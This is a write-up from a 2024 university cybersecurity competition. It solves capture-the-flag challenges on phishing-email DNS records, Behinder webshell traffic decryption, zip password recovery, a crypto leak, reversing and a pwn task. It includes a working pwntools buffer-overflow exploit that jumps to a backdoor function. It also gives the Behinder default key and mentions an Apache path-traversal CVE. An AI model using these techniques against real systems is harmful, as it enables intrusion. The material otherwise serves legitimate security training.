2024 University Cybersecurity Management and Operations Competition writeup

misc

Sign-in

The GIF hides the flag; concatenate the pieces and apply ROT13.

Phishing email identification

Base64-decode the email body to obtain the first flag segment:

flag{pHiSHhuntiNg}

Noticing that the DKIM record carries extra data, and following GitHub - kmille/dkim-verify: Verifying a DKIM-Signature by hand, we get the second flag segment:

dig txt +short default._domainkey.foobar-edu-cn.com
"v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8GgKsT+XBbAEBi0DlAX2ddQz5YOeiftZt5IvksHPnJqzv/Ckp5Iu8fWnPFXOGN7nPJtIvFDsWzW65FXXUVRjMntfcBNt97legXk/95dXAUMzG2i3 flag_part2=_Kn0wH0wt0_ qMcXGK+?+OwIDAQAB"

DMARC and SPF

dig txt +short spf.foobar-edu-cn.com
"v=spf1 redirect=spf.foobar-edu-cn.com"
"v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 -all flag_part1={N0wY0u"

dig txt +short _dmarc.foobar-edu-cn.com
"v=DMARC1; p=quarantine; rua=mailto:dmarc_agg@foobar-edu-cn.com; ruf=mailto:dmarc_frf@flag_part3=ANAlys1sDNS}

Concatenating all the parts yields the flag.
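As an added example (not part of the original writeup), the script below reproduces the DNS analysis in code: it walks the SPF redirect chain (the first record redirects to itself, which a real SPF evaluator rejects as a permerror, and a name with two v=spf1 records is itself invalid), checks that the DKIM p= value stops being valid base64 once the flag token is embedded, and assembles the flag_partN tokens in numeric order. The records are embedded as constructed input copied from the dig output above, so it runs offline.

```python
import re
# Constructed sample input: the three TXT records quoted from the dig output above.
TXT = {
    "spf.foobar-edu-cn.com": [
        "v=spf1 redirect=spf.foobar-edu-cn.com",
        "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 -all flag_part1={N0wY0u",
    ],
    "default._domainkey.foobar-edu-cn.com": [
        "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8GgKsT+XBbAEBi0DlAX2ddQz5YOeiftZt5IvksHPnJqzv/Ckp5Iu8fWnPFXOGN7nPJtIvFDsWzW65FXXUVRjMntfcBNt97legXk/95dXAUMzG2i3 flag_part2=_Kn0wH0wt0_ qMcXGK+?+OwIDAQAB",
    ],
    "_dmarc.foobar-edu-cn.com": [
        "v=DMARC1; p=quarantine; rua=mailto:dmarc_agg@foobar-edu-cn.com; ruf=mailto:dmarc_frf@flag_part3=ANAlys1sDNS}",
    ],
}
FLAG_RE = re.compile(r"flag_part(\d+)=(\S+)")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def parse_tags(record):
    # 'k=v; k=v' tag list (DKIM, DMARC); values keep any inner '='
    return dict(f.strip().split("=", 1) for f in record.split(";") if "=" in f)

def walk_spf(domain, seen=None):
    # Follow redirect= modifiers, collecting ip4 terms and the "all" qualifier.
    # Returns (ip4_list, all_qualifier, loop_detected).
    seen = set() if seen is None else seen
    if domain in seen:  # redirect loop: RFC 7208 treats this as permerror
        return [], None, True
    seen.add(domain)
    ips, all_q, looped = [], None, False
    for record in TXT.get(domain, []):
        for term in record.split()[1:]:  # skip the v=spf1 version tag
            if term.startswith("ip4:"):
                ips.append(term[4:])
            elif term.endswith("all"):
                all_q = term[:-3] or "+"  # qualifier prefix, "+" when absent
            elif term.startswith("redirect="):
                more, q, l = walk_spf(term[9:], seen)
                ips, all_q, looped = ips + more, all_q or q, looped or l
    return ips, all_q, looped

def dkim_key_is_valid_base64(domain):
    # A DKIM p= value that is not clean base64 means the record was tampered with or is malformed.
    return bool(B64_RE.match(parse_tags(TXT[domain][0])["p"]))

def assemble_flag():
    # Collect flag_partN= tokens from every record and join them in numeric order.
    parts = {int(n): t for recs in TXT.values() for r in recs for n, t in FLAG_RE.findall(r)}
    return "flag" + "".join(parts[k] for k in sorted(parts))
```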

easyshell

Behinder (冰蝎) 3.0; the default password is e45e329feb5d925b. See: behinder_decrypt/decropt.php at master · melody27/behinder_decrypt · GitHub

Decrypt the following traffic:

wXMPyNQkkVwIUwRmCdJvsbbN9rAT3TFkNlkEUss74vTkpmKI7uWZn8VnxlrAKnx5uKE28Gh0F/gPcq0bBoZvyJOA+mzUqI1XJL11zDKpxTzinmadeLYtXGJwTRmGbWu9xegJH8JVSQaHEqwOEltIRDxLmie1Fabk/SpgyViH+B4JQTn3VUkJyNDoHDJNW81QXcrQyy7VmFb1CEYqQ55IGx9XJLMMF+Jt/L7vlZkKRJa8SOMS52+jN0+wQ7u6voIJzyj5kc+t0Zi8+SN5PFzDI/Iahorbc67Z8lf20ohZiACoXimli6XaG+eNSI61ChlEOBI5ehsszpz2gkWtjMrU+JVFativxxUW+v1R3OfhDfGAAoJJFZPbMX44npM0PhizJUCJ0AfYuX8MlUp/SXPLYOKp7mHDi2zRDiimDHvYvJaD1x22qS0j+203vnlbo1dAvJyPhWE0f2N0rtgES0B+qEWgeWk9nCS2fEyxTozH+4fcXnbhdl68byLJWoJaxPOlJfWxO86cY/XZwu1RF3JxHY3p0f08VEjFVVRvbXnle6pdzdT/Dysh7XPZeYQ1o/1crPFH7MHP4fZrVW9iR/RXZfCXAYkYmSK2I1j8a1YsH7INFYLzzk5l+/If6UWuoq1SWhZD2C1sB78RXSkQpaHST5xq3hh3jj88Fd/LyF4/12Z51T93b/3J0hE2J9S+h2rV+bxROgCunCy1Z8h4Fu0ryj5+t3dk2ELoiuCkm6xlhJcvuZj1AWeEYJ/o9K9gNfAKte9hcQhYLcINyZbZW5GT3/acEfo61lgnHJX9i1Ioi/V3tM2f1Ju8Sae4GMXDXldAHusVGM8xXlKn+hBwpr9aGz0SZf6hUh0HklWljbPc7rMYfeZvW/evzOyg775bd9Jz4dMJgUoRdEjQawTh7Uo5NR/dd3qjKS8LQCM/+U83M+vjtRcNyRfMg3yyouDUVMDVX6v9OuqUGM0i8d997tOlY/wJt0Q+iXn1Kj41UjmioZU=

After a second round of base64 decoding we get an archive, but it is password-protected.

Decrypt this traffic:

lBLAHykVA/Ftm007T6iX50EFfBYbQ2Ev6/LcZKqQFmRCYU3ukfY6zNY58RomL0eaGR77pTNGGFYAKXWI7iHpoh/r1cfWWrNPIkP/8ZmCdfMVL8njZDVz1i46F5O1bAa9fvXrCG/HSAkL1N43jPXrDSdeZAT+YM3byvaBCbIfAcM=

After a second base64 decode we get:

Hello, but what you're looking for isn't me.

The CRC32 of this file after 7-Zip compression matches that of secret2.txt inside the archive, so a known-plaintext attack recovers the password:

A8s123/+*

After extraction, secret1.txt is the flag.

Gateway

Found in baseinfoSet.json:

106&112&101&107&127&101&104&49&57&56&53&56&54&56&49&51&51&105&56&103&106&49&56&50&56&103&102&56&52&101&104&102&105&53&101&53&102&129&

This looks a lot like a flag, so let's look for the pattern:

>>> a = "106&112&101&107&127&101&104&49&57&56&53&56&54&56&49&51&51&105&56&103&106&49&56&50&56&103&102&56&52&101&104&102&105&53&101&53&102&129"
>>> b = list(map(int,a.split("&")))
>>> b
[106, 112, 101, 107, 127, 101, 104, 49, 57, 56, 53, 56, 54, 56, 49, 51, 51, 105, 56, 103, 106, 49, 56, 50, 56, 103, 102, 56, 52, 101, 104, 102, 105, 53, 101, 53, 102, 129]
>>> c = [i-4 if i>57 else i for i in b]
>>> c
[102, 108, 97, 103, 123, 97, 100, 49, 57, 56, 53, 56, 54, 56, 49, 51, 51, 101, 56, 99, 102, 49, 56, 50, 56, 99, 98, 56, 52, 97, 100, 98, 101, 53, 97, 53, 98, 125]
>>> ''.join(list(map(chr,c)))
'flag{ad1985868133e8cf1828cb84adbe5a5b}'

SecretDB

Observed that 01 0f serves as a marker; of the two bytes that follow it, one is the position and the other is the character. Script used for the analysis:

# file offsets of every "01 0f" marker found in secret.db
_010f_index = [0x1EBE,0x1ECD,0x1ED5,0x1EDD,0x1EE5,0x1EED,0x1EF5,0x1EFD,0x1F05,0x1F0D,0x1F15,0x1F1D,0x1F25,0x1F2D,0x1F35,0x1F3D,0x1F45,0x1F4D,0x1F55,0x1F5D,0x1F65,0x1F6D,0x1F75,0x1F7D,0x1F85,0x1F8D,0x1F95,0x1F9D,0x1FA5,0x1FAD,0x1FB5,0x1FC4,0x1FCC,0x1FD4,0x1FDC,0x1FE4,0x1FEC,0x1FF4,0x1FFC]

sort_index = {}
data = open("./secret.db", "rb").read()
for i in _010f_index:
    # byte i+2 is the position inside the flag, byte i+3 is the character stored there
    sort_index[data[i + 2]] = chr(data[i + 3])

flag = ""
for i in range(42):
    flag += sort_index.get(i, "?")  # "?" marks a position no marker covered
print(flag)

Then brute-force the single remaining character.

zip

Not solved.

Apache

The Apache version is 2.4.49, which is affected by the path traversal vulnerability CVE-2021-41773.

FROM httpd:2.4.49-buster

COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf

for r

Not solved.

Algorithm

babyai

readSeed has an overflow bug that may be exploitable.

secretbit

The challenge provides this program:

from secret import flag
from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdm


def instance(m, n):
    start = list(range(m))
    shuffle(start)
    for i in range(m):
        now = start[i]
        this_turn = False
        for j in range(n-1):
            if now == i:
                this_turn = True
                break
            now = start[now]
        if not this_turn:
            return 0
    return 1


def leak(m, n, times=2000):
    message = [instance(m, n) for _ in range(times)]
    return message


MAX_M = 400
MIN_M = 200
flag_b = [int(i) for i in bin(bytes_to_long(flag))[2:]]
leak_message = []

for bi in tqdm(flag_b):
    while True:
        tmp_m0 = randrange(MIN_M, MAX_M)
        tmp_n0 = randrange(int(tmp_m0//2), int(tmp_m0 * 8 // 9))
        tmp_m1 = randrange(MIN_M, MAX_M)
        tmp_n1 = randrange(int(tmp_m1//2), int(tmp_m1 * 8 // 9))
        if abs(tmp_m0-tmp_m1-tmp_n0+tmp_n1) > MAX_M // 5:
            break
    choose_m = tmp_m0 if bi == 0 else tmp_m1
    choose_n = tmp_n0 if bi == 0 else tmp_n1
    leak_message.append([[tmp_m0, tmp_n0], [tmp_m1, tmp_n1], leak(choose_m, choose_n)])

open('data.txt', 'w').write(str(leak_message))

Roughly: it implements instance itself, splits the flag into its binary bits, picks one of two (m, n) pairs depending on whether each bit is 0 or 1, and then runs the randomized trials with the chosen pair.

Since the code is given in full and the number of trials is large, we can simulate both candidate pairs ourselves, count the 1s, compare against the given data, and take the pair whose count is closer as the answer, recovering the flag bit by bit.

import ast
from random import shuffle
from Crypto.Util.number import long_to_bytes

def instance(m, n):
    start = list(range(m))
    shuffle(start)
    for i in range(m):
        now = start[i]
        this_turn = False
        for j in range(n-1):
            if now == i:
                this_turn = True
                break
            now = start[now]
        if not this_turn:
            return 0
    return 1


def leak(m, n, times=2000):
    message = [instance(m, n) for _ in range(times)]
    return message

# each entry is [[m0, n0], [m1, n1], leak(choose_m, choose_n)] as written by the challenge
data = ast.literal_eval(open('data.txt', 'r').read())

flag_bit = ""
for d in data:
    u = sum(d[2])                       # number of 1s in the leaked samples
    x1 = sum(leak(d[0][0], d[0][1]))    # simulated count for the bit-0 pair
    x2 = sum(leak(d[1][0], d[1][1]))    # simulated count for the bit-1 pair
    # the pair whose simulated count lies closer to the leak is the one that was chosen
    if abs(u - x1) > abs(u - x2):
        flag_bit += "1"
    else:
        flag_bit += "0"
    print(flag_bit)
# 110011001101100011000010110011101111011011101000110100001101001011100110101111100110001011100110101111101110100011010000110010101011111011100110100010101100011011100100110010101110100010111110110011000110001011000010110011101111101
flag_bit = int(flag_bit, 2)
print(long_to_bytes(flag_bit))

reverse

easyre

The encryption is a base64 variant with a shuffled alphabet; map it back to the standard alphabet and decode:

import base64

table = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"
table_ = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def custom_b64decode(input_str):
    std_encoded = input_str.translate(str.maketrans(table, table_))

    decoded_bytes = base64.b64decode(std_encoded)
    return decoded_bytes

flag_encode = "AncsA6gXMSMoMqIuNCMuxaYuAGIavC9="
print(custom_b64decode(flag_encode))

babyre

The binary is UPX-packed; after unpacking, analysis shows the flag is made of 4 parts, each of which can be brute-forced:

#include <cstdint>
#include <cstdio>

int main()
{
    // part 1 is a plain sum of two constants
    printf("%08x\n",0xADB1D018+0x36145344);

    // part 2: brute-force the 32-bit value satisfying the recovered constraint
    for(uint32_t i=0;i<0xffffffff;i++)
    {
        if((i | 0x8E03BEC3) - 3 * (i & 0x71FC413C) + i == 0x902C7FF8)
        {
            printf("%08x\n",i);
            break;
        }
    }

    // part 3: same approach with the second constraint
    for(uint32_t i=0;i<0x10000000;i++)
    {
        if ( 4 * ((~i & 0xA8453437) + 2 * ~(~i | 0xA8453437)) + -3 * (~i | 0xA8453437) + 3 * ~(i | 0xA8453437) - (-10 * (i & 0xA8453437) + (i ^ 0xA8453437)) == 551387557 )
        {
            printf("%08x\n",i);
            break;
        }
    }

    // part 4: same approach with the third constraint
    for(uint32_t i = 0;i<0x10000000;i++)
    {
        if ( 11 * ~(i ^ 0xE33B67BD) + 4 * ~(~i | 0xE33B67BD) - (6 * (i & 0xE33B67BD) + 12 * ~(i | 0xE33B67BD)) + 3 * (i & 0xD2C7FC0C) + -5 * i - 2 * ~(i | 0xD2C7FC0C) + ~(i | 0x2D3803F3) + 4 * (i & 0x2D3803F3) - (-2) * (i | 0x2D3803F3) == -837785892 )
        {
            printf("%08x\n",i);
            break;
        }
    }

    return 0;
}

pwn

babypwn

Overflow into the backdoor function to get the pwn:

from pwn import *

p=process("./babypwn")

p.recvuntil(b'username:')
payload=b'root'
p.sendline(payload)

p.recvuntil(b'password:')
payload=b'a'*(0x30+0x08)+p64(0x401177)
p.sendline(payload)
p.interactive()
Posted 2024-05-11 17:28 by 寒江寻影